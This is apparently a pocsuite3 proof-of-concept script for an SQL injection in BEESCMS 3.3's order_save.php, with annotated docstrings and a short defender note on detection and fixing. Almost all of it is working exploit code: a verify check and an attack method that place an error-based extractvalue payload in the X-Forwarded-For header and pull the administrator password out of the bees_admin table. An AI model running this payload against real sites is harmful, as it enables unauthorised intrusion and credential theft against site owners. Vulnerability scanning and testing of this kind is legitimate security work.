"""
pocsuite3 proof-of-concept for ssvid 1261: SQL injection in BEESCMS 3.3,
``/mx_form/order_save.php``.  The injected value travels in the
``X-Forwarded-For`` request header.

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
import re

from pocsuite3.api import Output, POCBase, register_poc, requests


class DemoPOC(POCBase):
    """PoC for the BEESCMS 3.3 ``order_save.php`` SQL injection.

    Both checks POST the same fixed order form to ``/mx_form/order_save.php``
    and place the SQL payload in the ``X-Forwarded-For`` header; the
    application therefore appears to use the client-IP header inside a SQL
    statement without escaping or parameterisation (inferred from the payload,
    the vulnerable server-side code is not on this page).  ``_verify`` only
    looks for a fixed marker substring in the response body; ``_attack`` reads
    the ``admin_password`` column back out of the database error message.
    The ``desc`` text (Chinese) states that the 3.4 form carries a CAPTCHA,
    so the PoC does not work there.

    Defender notes: a POST to this path whose ``X-Forwarded-For`` value
    contains quote characters or SQL function names is an unambiguous
    detection signal, and the durable fix is to treat forwarded-IP headers as
    untrusted input bound as query parameters rather than spliced into SQL.
    """
    vulID = '1261'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-04-28'
    createDate = '2014-05-05'
    updateDate = '2014-05-05'
    references = ['http://wooyun.org/bugs/wooyun-2014-058601']
    name = 'BEESCMS 3.3 /order_save.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.beescms.com/'
    appName = 'BEESCMS'
    appVersion = '3.3#'
    vulType = 'SQL Injection'
    # Chinese text, kept verbatim because it is runtime metadata.  It says:
    # "BEESCMS 3.4 latest version: SQL injection, the admin password can be
    # extracted; the 3.4 form has a CAPTCHA, so this PoC cannot be used."
    desc = '''
    BEESCMS 3.4最新版,SQL注入漏洞,可注出admin密码,3.4版本表单存在验证码,无法使用此poc.
    '''
    samples = []
    install_requires = ['']  # a single empty entry; presumably a template leftover

    def _verify(self) -> Output:
        """Send the probe request and report whether the marker string came back.

        Returns:
            An ``Output`` marked success (carrying ``VerifyInfo.URL``) when the
            response body contains the expected marker, otherwise failure.
        """
        result = {}
        product_url = self.url + '/mx_form/order_save.php'
        # Fixed, URL-encoded order form; the field values are filler.
        post_data = 'form_id=5&fields%5Bmail%5D=&fields%5Busername%5D=1' \
                    '&fields%5Btel%5D=1&fields%5Bweb_contact%5D=1' \
                    '&fields%5Baddress%5D=1&fields%5Bcontent%5D=1' \
                    '&lang=cn&f_id=22&submit=%E6%8F%90%E4%BA%A4'
        headers_fake = {}
        # The header value is ONE string literal continued with a
        # backslash-newline, so any leading whitespace on the continuation line
        # becomes part of the header value.  NOTE(review): this page's rendering
        # does not preserve the original indentation; confirm the exact value
        # against the upstream file before relying on it.
        headers_fake['X-Forwarded-For'] = "8.8.8.8',extractvalue'\
'(1,conCat(0x24, (sEleCt md5(3.1416)))),'22') -- #"
        # No explicit timeout is passed; whether the pocsuite3 ``requests``
        # wrapper applies a default one is not visible here.
        r = requests.post(product_url, data=post_data, headers=headers_fake)
        # Marker presumably is the leading hex of the md5() the payload asks
        # the database to compute, echoed back inside the error text.
        if '8b3ed8ed86db2ef2cd728' in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = product_url
        return self.parse_output(result)

    def parse_output(self, result: dict) -> Output:
        """Wrap a result dict in an ``Output``: non-empty means success.

        Args:
            result: Findings collected by ``_verify``/``_attack``; an empty
                dict is reported as "target is not vulnerable".
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self) -> Output:
        """Send the extraction request and pull the leaked value from the error text.

        Uses the same form body as ``_verify`` (duplicated rather than shared).
        The response is searched for ``syntax error: '<text>'``; whatever sits
        between the quotes is reported as ``AdminInfo.Password``.

        Returns:
            An ``Output`` marked success with ``AdminInfo.Password`` when the
            pattern matched, otherwise failure.
        """
        product_url = self.url + '/mx_form/order_save.php'
        result = {}
        headers_fake = {}
        post_data = 'form_id=5&fields%5Bmail%5D=&fields%5Busername%5D=1' \
                    '&fields%5Btel%5D=1&fields%5Bweb_contact%5D=1' \
                    '&fields%5Baddress%5D=1&fields%5Bcontent%5D=1' \
                    '&lang=cn&f_id=22&submit=%E6%8F%90%E4%BA%A4'
        # Same backslash-newline continuation as in _verify; see the note there.
        headers_fake['X-Forwarded-For'] = "8.8.8.8',extractvalue'\
'(1,conCat(0x24, (sEleCt admin_password FrOm `bees_admin`))),'22') -- #"
        r = requests.post(product_url, data=post_data, headers=headers_fake)
        content = r.text
        # Non-greedy capture of the first single-quoted span after the
        # "syntax error: " prefix of the database error message.
        match = re.search("syntax error: '(.*?)'", content)
        if match:
            result['AdminInfo'] = {}
            result['AdminInfo']['Password'] = match.group(1)
        return self.parse_output(result)

    def _shell(self) -> None:
        """Not implemented for this PoC."""
        pass


register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案